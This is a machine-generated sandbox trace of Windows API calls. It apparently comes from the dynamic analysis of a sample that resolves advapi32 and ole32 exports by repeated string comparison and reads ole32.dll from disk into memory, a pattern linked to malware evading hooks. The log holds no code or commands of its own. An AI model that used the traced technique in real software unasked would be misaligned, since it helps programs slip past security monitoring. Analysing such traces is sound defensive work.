1 [0262.458] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleA") returned 1 [0262.458] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleW") returned 0 [0262.458] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="A_SHAFinal") returned 1 [0262.458] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="A_SHAInit") returned 1 [0262.458] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="A_SHAUpdate") returned 1 [0262.458] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AbortSystemShutdownA") returned 1 [0262.458] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AbortSystemShutdownW") returned 1 [0262.458] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheck") returned 1 [0262.458] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0262.458] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0262.458] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckByType") returned 1 [0262.458] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0262.458] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0262.458] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckByTypeResultList") returned 1 [0262.458] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 1 [0262.458] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleA") returned 1 [0262.458] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleW") returned 1 [0262.458] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckByTypeResultListAndAuditAlarmW") returned 0 [0262.458] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="A_SHAFinal") returned 1 [0262.458] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="A_SHAInit") returned 1 [0262.458] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="A_SHAUpdate") returned 1 [0262.458] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AbortSystemShutdownA") returned 1 [0262.459] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AbortSystemShutdownW") returned 1 [0262.459] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheck") returned 1 [0262.459] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0262.459] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0262.459] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckByType") returned 1 [0262.459] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0262.459] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0262.459] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckByTypeResultList") returned 1 [0262.459] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 1 [0262.459] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleA") returned 1 [0262.459] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleW") returned 1 [0262.459] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmW") returned 1 [0262.459] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AddAccessAllowedAce") returned 0 [0262.459] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="A_SHAFinal") returned 1 [0262.460] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="A_SHAInit") returned 1 [0262.460] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="A_SHAUpdate") returned 1 [0262.460] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AbortSystemShutdownA") returned 1 [0262.460] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AbortSystemShutdownW") returned 1 [0262.460] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheck") returned 1 [0262.460] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0262.460] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0262.460] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckByType") returned 1 [0262.460] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0262.460] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0262.460] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckByTypeResultList") returned 1 [0262.460] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 1 [0262.460] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleA") returned 1 [0262.460] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleW") returned 1 [0262.460] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckByTypeResultListAndAuditAlarmW") returned 1 [0262.460] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AddAccessAllowedAce") returned 1 [0262.460] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AddAccessAllowedAceEx") returned 0 [0262.460] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="A_SHAFinal") returned 1 [0262.461] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="A_SHAInit") returned 1 [0262.461] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="A_SHAUpdate") returned 1 [0262.461] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AbortSystemShutdownA") returned 1 [0262.461] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AbortSystemShutdownW") returned 1 [0262.461] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheck") returned 1 [0262.461] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0262.461] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0262.461] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckByType") returned 1 [0262.461] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0262.461] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0262.461] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckByTypeResultList") returned 1 [0262.461] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 1 [0262.461] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleA") returned 1 [0262.461] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleW") returned 1 [0262.461] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmW") returned 1 [0262.461] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AddAccessAllowedAce") returned 1 [0262.461] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AddAccessAllowedAceEx") returned 1 [0262.461] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AddAccessAllowedObjectAce") returned 0 [0262.461] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="A_SHAFinal") returned 1 [0262.462] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="A_SHAInit") returned 1 [0262.462] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="A_SHAUpdate") returned 1 [0262.462] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AbortSystemShutdownA") returned 1 [0262.462] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AbortSystemShutdownW") returned 1 [0262.462] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheck") returned 1 [0262.462] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0262.462] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0262.462] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckByType") returned 1 [0262.462] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0262.462] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0262.462] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckByTypeResultList") returned 1 [0262.462] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 1 [0262.462] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleA") returned 1 [0262.462] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleW") returned 1 [0262.462] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmW") returned 1 [0262.463] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AddAccessAllowedAce") returned 1 [0262.463] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AddAccessAllowedAceEx") returned 1 [0262.463] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AddAccessAllowedObjectAce") returned 1 [0262.463] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AddAccessDeniedAce") returned 0 [0262.463] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="A_SHAFinal") returned 1 [0262.463] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="A_SHAInit") returned 1 [0262.463] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="A_SHAUpdate") returned 1 [0262.463] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AbortSystemShutdownA") returned 1 [0262.463] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AbortSystemShutdownW") returned 1 [0262.463] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheck") returned 1 [0262.463] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0262.464] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0262.464] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckByType") returned 1 [0262.464] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0262.464] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0262.464] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckByTypeResultList") returned 1 [0262.464] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 1 [0262.464] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleA") returned 1 [0262.464] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleW") returned 1 [0262.464] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckByTypeResultListAndAuditAlarmW") returned 1 [0262.464] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AddAccessAllowedAce") returned 1 [0262.464] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AddAccessAllowedAceEx") returned 1 [0262.464] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AddAccessAllowedObjectAce") returned 1 [0262.464] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AddAccessDeniedAce") returned 1 [0262.464] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AddAccessDeniedAceEx") returned 0 [0262.465] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="A_SHAFinal") returned 1 [0262.465] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="A_SHAInit") returned 1 [0262.465] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="A_SHAUpdate") returned 1 [0262.465] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AbortSystemShutdownA") returned 1 [0262.465] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AbortSystemShutdownW") returned 1 [0262.465] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheck") returned 1 [0262.465] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0262.465] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0262.465] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckByType") returned 1 [0262.465] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0262.465] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0262.465] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckByTypeResultList") returned 1 [0262.465] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 1 [0262.465] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleA") returned 1 [0262.465] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleW") returned 1 [0262.465] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmW") returned 1 [0262.466] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AddAccessAllowedAce") returned 1 [0262.466] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AddAccessAllowedAceEx") returned 1 [0262.466] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AddAccessAllowedObjectAce") returned 1 [0262.466] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AddAccessDeniedAce") returned 1 [0262.466] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AddAccessDeniedAceEx") returned 1 [0262.466] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AddAccessDeniedObjectAce") returned 0 [0262.466] lstrcmpA (lpString1="AddAce", lpString2="A_SHAFinal") returned 1 [0262.466] lstrcmpA (lpString1="AddAce", lpString2="A_SHAInit") returned 1 [0262.735] GetProcessHeap () returned 0x400000 [0262.735] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x2c32010 | out: hHeap=0x400000) returned 1 [0262.743] GetProcessHeap () returned 0x400000 [0262.743] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x10) returned 0x419100 [0262.745] LoadLibraryA (lpLibFileName="Ole32.dll") returned 0x7ffc5e3e0000 [0262.745] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0262.746] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0262.747] GetModuleFileNameA (in: hModule=0x7ffc5e3e0000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll")) returned 0x1d [0262.747] CreateFileA (lpFileName="C:\\Windows\\system32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0262.748] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0262.748] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0262.748] GetFileSizeEx (in: hFile=0x140, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=1322240) returned 1 [0262.792] GetProcessHeap () returned 0x400000 [0262.792] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x142d00) returned 0x3ff0040 [0262.798] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0262.798] ReadFile (in: hFile=0x140, lpBuffer=0x3ff0040, nNumberOfBytesToRead=0x142d00, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x3ff0040*, lpNumberOfBytesRead=0x14f5a4*=0x142d00, lpOverlapped=0x0) returned 1 [0262.918] CloseHandle (hObject=0x140) returned 1 [0262.919] lstrcmpA (lpString1="BindMoniker", lpString2="BindMoniker") returned 0 [0262.919] lstrcmpA (lpString1="CLIPFORMAT_UserFreeExt", lpString2="BindMoniker") returned 1 [0262.919] lstrcmpA (lpString1="CLIPFORMAT_UserFreeExt", lpString2="CLIPFORMAT_UserFree") returned 1 [0262.919] lstrcmpA (lpString1="CLIPFORMAT_UserFreeExt", lpString2="CLIPFORMAT_UserFree64") returned 1 [0262.919] lstrcmpA (lpString1="CLIPFORMAT_UserFreeExt", lpString2="CLIPFORMAT_UserFreeExt") returned 0 [0262.919] lstrcmpA (lpString1="CLIPFORMAT_UserMarshalExt", lpString2="BindMoniker") returned 1 [0262.919] lstrcmpA (lpString1="CLIPFORMAT_UserMarshalExt", lpString2="CLIPFORMAT_UserFree") returned 1 [0262.919] lstrcmpA (lpString1="CLIPFORMAT_UserMarshalExt", lpString2="CLIPFORMAT_UserFree64") returned 1 [0262.919] lstrcmpA (lpString1="CLIPFORMAT_UserMarshalExt", lpString2="CLIPFORMAT_UserFreeExt") returned 1 [0262.919] lstrcmpA (lpString1="CLIPFORMAT_UserMarshalExt", lpString2="CLIPFORMAT_UserMarshal") returned 1 [0262.919] lstrcmpA (lpString1="CLIPFORMAT_UserMarshalExt", lpString2="CLIPFORMAT_UserMarshal64") returned 1 [0262.919] lstrcmpA (lpString1="CLIPFORMAT_UserMarshalExt", lpString2="CLIPFORMAT_UserMarshalExt") returned 0 [0262.919] lstrcmpA (lpString1="CLIPFORMAT_UserSizeExt", lpString2="BindMoniker") returned 1 [0262.919] lstrcmpA (lpString1="CLIPFORMAT_UserSizeExt", lpString2="CLIPFORMAT_UserFree") returned 1 [0262.919] lstrcmpA (lpString1="CLIPFORMAT_UserSizeExt", lpString2="CLIPFORMAT_UserFree64") returned 1 [0262.919] lstrcmpA (lpString1="CLIPFORMAT_UserSizeExt", lpString2="CLIPFORMAT_UserFreeExt") returned 1 [0262.919] lstrcmpA (lpString1="CLIPFORMAT_UserSizeExt", lpString2="CLIPFORMAT_UserMarshal") returned 1 [0262.919] lstrcmpA (lpString1="CLIPFORMAT_UserSizeExt", lpString2="CLIPFORMAT_UserMarshal64") returned 1 [0262.919] lstrcmpA (lpString1="CLIPFORMAT_UserSizeExt", lpString2="CLIPFORMAT_UserMarshalExt") returned 1 [0262.919] lstrcmpA (lpString1="CLIPFORMAT_UserSizeExt", lpString2="CLIPFORMAT_UserSize") returned 1 [0262.919] lstrcmpA (lpString1="CLIPFORMAT_UserSizeExt", lpString2="CLIPFORMAT_UserSize64") returned 1 [0262.919] lstrcmpA (lpString1="CLIPFORMAT_UserSizeExt", lpString2="CLIPFORMAT_UserSizeExt") returned 0 [0262.919] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="BindMoniker") returned 1 [0262.919] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserFree") returned 1 [0262.920] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserFree64") returned 1 [0262.920] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserFreeExt") returned 1 [0262.920] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserMarshal") returned 1 [0262.920] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserMarshal64") returned 1 [0262.920] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserMarshalExt") returned 1 [0262.920] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserSize") returned 1 [0262.920] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserSize64") returned 1 [0262.920] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserSizeExt") returned 1 [0262.920] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserUnmarshal") returned 1 [0262.920] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserUnmarshal64") returned 1 [0262.920] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserUnmarshalExt") returned 0 [0262.920] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="BindMoniker") returned 1 [0262.920] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserFree") returned 1 [0262.920] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserFree64") returned 1 [0262.920] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserFreeExt") returned 1 [0262.920] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserMarshal") returned 1 [0262.920] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserMarshal64") returned 1 [0262.920] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserMarshalExt") returned 1 [0262.920] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserSize") returned 1 [0262.920] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserSize64") returned 1 [0262.920] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserSizeExt") returned 1 [0262.920] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserUnmarshal") returned 1 [0262.920] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserUnmarshal64") returned 1 [0262.920] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserUnmarshalExt") returned 1 [0262.920] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLSIDFromOle1Class") returned 1 [0262.920] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLSIDFromProgID") returned 1 [0262.920] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLSIDFromProgIDEx") returned 0 [0262.921] lstrcmpA (lpString1="CheckInitDde", lpString2="BindMoniker") returned 1 [0262.921] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserFree") returned -1 [0262.921] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserFree64") returned -1 [0262.921] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserFreeExt") returned -1 [0262.921] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserMarshal") returned -1 [0262.921] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserMarshal64") returned -1 [0262.921] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserMarshalExt") returned -1 [0262.921] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserSize") returned -1 [0262.921] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserSize64") returned -1 [0262.921] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserSizeExt") returned -1 [0262.921] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserUnmarshal") returned -1 [0262.921] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserUnmarshal64") returned -1 [0262.921] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserUnmarshalExt") returned -1 [0262.921] lstrcmpA (lpString1="CheckInitDde", lpString2="CLSIDFromOle1Class") returned -1 [0262.921] lstrcmpA (lpString1="CheckInitDde", lpString2="CLSIDFromProgID") returned -1 [0262.921] lstrcmpA (lpString1="CheckInitDde", lpString2="CLSIDFromProgIDEx") returned -1 [0262.921] lstrcmpA (lpString1="CheckInitDde", lpString2="CLSIDFromString") returned -1 [0262.921] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdAsyncStubBuffer2_Connect") returned -1 [0262.922] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdAsyncStubBuffer2_Disconnect") returned -1 [0262.922] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdAsyncStubBuffer2_Release") returned -1 [0262.922] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdAsyncStubBuffer_AddRef") returned -1 [0262.922] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdAsyncStubBuffer_Connect") returned -1 [0262.922] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdAsyncStubBuffer_Disconnect") returned -1 [0262.922] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdAsyncStubBuffer_Invoke") returned -1 [0262.922] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdAsyncStubBuffer_QueryInterface") returned -1 [0262.922] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdAsyncStubBuffer_Release") returned -1 [0262.922] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdStubBuffer2_Connect") returned -1 [0262.922] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdStubBuffer2_CountRefs") returned -1 [0262.922] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdStubBuffer2_Disconnect") returned -1 [0262.922] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdStubBuffer2_QueryInterface") returned -1 [0262.922] lstrcmpA (lpString1="CheckInitDde", lpString2="CheckInitDde") returned 0 [0262.922] lstrcmpA (lpString1="CleanROTForApartment", lpString2="BindMoniker") returned 1 [0262.922] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserFree") returned -1 [0262.922] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserFree64") returned -1 [0262.922] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserFreeExt") returned -1 [0262.922] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserMarshal") returned -1 [0262.922] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserMarshal64") returned -1 [0262.922] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserMarshalExt") returned -1 [0262.922] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserSize") returned -1 [0262.922] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserSize64") returned -1 [0262.922] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserSizeExt") returned -1 [0262.922] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserUnmarshal") returned -1 [0262.922] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserUnmarshal64") returned -1 [0262.922] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserUnmarshalExt") returned -1 [0262.923] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLSIDFromOle1Class") returned -1 [0262.923] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLSIDFromProgID") returned 